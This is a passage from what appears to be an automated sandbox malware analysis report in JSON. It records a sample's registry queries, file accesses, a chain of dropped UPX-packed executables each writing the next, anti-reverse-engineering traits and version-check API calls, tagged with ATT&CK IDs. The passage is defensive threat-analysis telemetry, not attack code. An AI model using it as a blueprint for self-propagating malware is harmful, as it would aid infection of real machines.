\"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"c:\\0004664.exe\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0004664.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4060800.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"482642.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lthxxd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"bbpbfhd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ntpbdh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rrjxnjh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"004422.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rlrbxrl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pnrdltb.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hvjhb.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xnpjdph.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" writes file \"c:\\0004664.exe\"\n \"0004664.exe\" writes file \"c:\\4060800.exe\"\n \"4060800.exe\" writes file \"c:\\482642.exe\"\n \"482642.exe\" writes file \"c:\\lthxxd.exe\"\n \"lthxxd.exe\" writes file \"c:\\bbpbfhd.exe\"\n \"bbpbfhd.exe\" writes file \"c:\\ntpbdh.exe\"\n \"ntpbdh.exe\" writes file \"c:\\rrjxnjh.exe\"\n \"rrjxnjh.exe\" writes file \"c:\\004422.exe\"\n \"004422.exe\" writes file \"c:\\rlrbxrl.exe\"\n \"rlrbxrl.exe\" writes file \"c:\\pnrdltb.exe\"\n \"pnrdltb.exe\" writes file \"c:\\hvjhb.exe\"\n \"hvjhb.exe\" writes file \"c:\\xnpjdph.exe\"\n \"xnpjdph.exe\" writes file \"c:\\024648.exe\"\n \"024648.exe\" writes file \"c:\\640660.exe\"\n \"640660.exe\" writes file \"c:\\22404.exe\"\n \"22404.exe\" writes file \"c:\\4862082.exe\"\n \"4862082.exe\" writes file \"c:\\fnvpbxr.exe\"\n \"fnvpbxr.exe\" writes file \"c:\\njdbdxd.exe\"\n \"njdbdxd.exe\" writes file \"c:\\brrppv.exe\"\n \"brrppv.exe\" writes file \"c:\\20640.exe\"\n \"20640.exe\" writes file \"c:\\22260.exe\"\n \"22260.exe\" writes file \"c:\\408224.exe\"\n \"408224.exe\" writes file \"c:\\26064.exe\"\n \"26064.exe\" writes file \"c:\\2848464.exe\"\n \"2848464.exe\" writes file \"c:\\hntdntx.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"tfpfbjl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjvxrf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pttxvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lnnjjb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jfrfbtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bpbtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pjbbvdd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pdnrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hpdnldp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xlrxxtf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rvhlvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vxxfjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dnxpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"drbdjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drbdjh.exe]- [targetUID: 00000000-00003252]\n \"lhrhrpt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lhrhrpt.exe]- [targetUID: 00000000-00003748]\n \"rtrnhfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rtrnhfh.exe]- [targetUID: 00000000-00003748]\n \"vhftp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vhftp.exe]- [targetUID: 00000000-00004488]\n \"lxhhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxhhl.exe]- [targetUID: 00000000-00004488]\n \"fnrxft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnrxft.exe]- [targetUID: 00000000-00002576]\n \"dpndv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpndv.exe]- [targetUID: 00000000-00001884]\n \"rxfxxnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxfxxnn.exe]- [targetUID: 00000000-00001884]\n \"xprhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xprhl.exe]- [targetUID: 00000000-00001620]\n \"npjbvrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\npjbvrb.exe]- [targetUID: 00000000-00001620]\n \"220404.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\220404.exe]- [targetUID: 00000000-00000864]\n \"44206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44206.exe]- [targetUID: 00000000-00000864]\n \"4220002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4220002.exe]- [targetUID: 00000000-00003876]\n \"8084222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8084222.exe]- [targetUID: 00000000-00000416]\n \"88060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88060.exe]- [targetUID: 00000000-00002836]\n \"0484008.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0484008.exe]- [targetUID: 00000000-00002832]\n \"vdphh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vdphh.exe]- [targetUID: 00000000-00002832]\n \"xvprxbd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xvprxbd.exe]- [targetUID: 00000000-00000328]\n \"nlrvnpx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nlrvnpx.exe]- [targetUID: 00000000-00000328]\n \"vbtfdd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vbtfdd.exe]- [targetUID: 00000000-00000272]\n \"btvjnxf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\btvjnxf.exe]- [targetUID: 00000000-00000272]\n \"840062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\840062.exe]- [targetUID: 00000000-00003804]\n \"482820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482820.exe]- [targetUID: 00000000-00002756]\n \"06668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06668.exe]- [targetUID: 00000000-00002756]\n \"22624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22624.exe]- [targetUID: 00000000-00004172]\n \"fhjttl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhjttl.exe]- [targetUID: 00000000-00004172]\n \"hlrtth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hlrtth.exe]- [targetUID: 00000000-00002784]\n \"dfllnjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dfllnjr.exe]- [targetUID: 00000000-00003680]\n \"vnhnhxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnhnhxx.exe]- [targetUID: 00000000-00003556]\n \"fjhdxhf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fjhdxhf.exe]- [targetUID: 00000000-00003556]\n \"202808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\202808.exe]- [targetUID: 00000000-00003204]\n \"8486482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8486482.exe]- [targetUID: 00000000-00002976]\n \"02848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02848.exe]- [targetUID: 00000000-00002976]\n \"82080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82080.exe]- [targetUID: 00000000-00003700]\n \"6466842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6466842.exe]- [targetUID: 00000000-00003700]\n \"0660220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0660220.exe]- [targetUID: 00000000-00002776]\n \"482028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482028.exe]- [targetUID: 00000000-00002776]\n \"664004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\664004.exe]- [targetUID: 00000000-00001380]\n \"vdxvjb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vdxvjb.exe]- [targetUID: 00000000-00001380]\n \"hntdntx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hntdntx.exe]- [targetUID: 00000000-00003292]\n \"2848464.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2848464.exe]- [targetUID: 00000000-00003484]\n \"26064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26064.exe]- [targetUID: 00000000-00004160]\n \"408224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408224.exe]- [targetUID: 00000000-00001920]\n \"22260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22260.exe]- [targetUID: 00000000-00001920]\n \"20640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20640.exe]- [targetUID: 00000000-00003764]\n \"brrppv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brrppv.exe]- [targetUID: 00000000-00003540]\n \"njdbdxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njdbdxd.exe]- [targetUID: 00000000-00003540]\n \"fnvpbxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnvpbxr.exe]- [targetUID: 00000000-00003560]\n \"4862082.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4862082.exe]- [targetUID: 00000000-00003560]\n \"22404.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22404.exe]- [targetUID: 00000000-00004336]\n \"640660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\640660.exe]- [targetUID: 00000000-00002764]\n \"024648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\024648.exe]- [targetUID: 00000000-00002764]\n \"xnpjdph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xnpjdph.exe]- [targetUID: 00000000-00004280]\n \"hvjhb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hvjhb.exe]- [targetUID: 00000000-00006016]\n \"pnrdltb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pnrdltb.exe]- [targetUID: 00000000-00006016]\n \"rlrbxrl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rlrbxrl.exe]- [targetUID: 00000000-00006136]\n \"004422.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\004422.exe]- [targetUID: 00000000-00005464]\n \"rrjxnjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rrjxnjh.exe]- [targetUID: 00000000-00005756]\n \"ntpbdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntpbdh.exe]- [targetUID: 00000000-00005756]\n \"bbpbfhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bbpbfhd.exe]- [targetUID: 00000000-00005940]\n \"lthxxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lthxxd.exe]- [targetUID: 00000000-00005940]\n \"482642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482642.exe]- [targetUID: 00000000-00006068]\n \"4060800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4060800.exe]- [targetUID: 00000000-00005812]\n \"0004664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0004664.exe]- [targetUID: 00000000-00005812]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006800403b68003b3b6800000000000000000000006000000000011ce312000000000080f0120095e13377b1390700feffffff435c377750593777aa000000b80000003a3b6800383b6800a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3777623b6800a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d75623b6800a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005860)\n \"0004664.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005812)\n \"0004664.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004601b05c4601ab5c4601000000000000000000001e00000000011ce312000000000080f0120095e1337779380700feffffff435c377750593777aa000000b8000000aa5c4601a85c4601a4e41200dce81200000000000000000000000000000000000000000000000000e014000000001e001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3777d25c4601a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d75d25c4601a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00005812)\n \"0004664.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005812)\n \"4060800.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006068)\n \"4060800.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004201305442012b544201000000000000000000001500000000011ce312000000000080f0120095e13377ca3d0700feffffff435c377750593777aa000000b80000002a54420128544201a4e41200dce8120000000000000000000000000000000000000000000000000000150000000015001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed377752544201a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d7552544201a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00006068)\n \"4060800.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006068)\n \"482642.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003700802837007b283700000000000000000000002f00000000011ce312000000000080f0120095e133779a230700feffffff435c377750593777aa000000b80000007a28370078283700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3777a2283700a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d75a2283700a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00006112)\n \"482642.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006112)\n \"lthxxd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"lthxxd.exe\" called \"RtlGetVersion\" with parameter 